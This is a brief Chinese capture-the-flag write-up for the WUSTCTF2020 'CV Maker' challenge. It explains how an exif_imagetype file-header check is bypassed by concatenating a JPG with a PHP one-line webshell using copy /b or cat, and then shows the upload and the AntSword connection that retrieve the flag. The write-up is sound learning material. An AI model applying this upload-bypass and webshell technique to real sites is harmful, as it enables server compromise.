WEB｜[WUSTCTF2020]CV Maker

注册帐号登录

存在文件上传的地方，上传一句话木马文件

提示exif_imagetype not image!，exif_imagetype是php里通过文件头判断是不是图片，可以通过图片马绕过

exif_imagetype() 读取一个图像的第一个字节并检查其签名。

制作图片马

# win
copy 1.jpg /b + shell.php 1.php

# linux
cat 1.jpg shell.php > 1.php

上传图片马

查看文件路径，上传成功

蚁剑连接图片马成功

得到flag

flag{a5c90492-2361-45e4-a2be-d9cf32f77efc}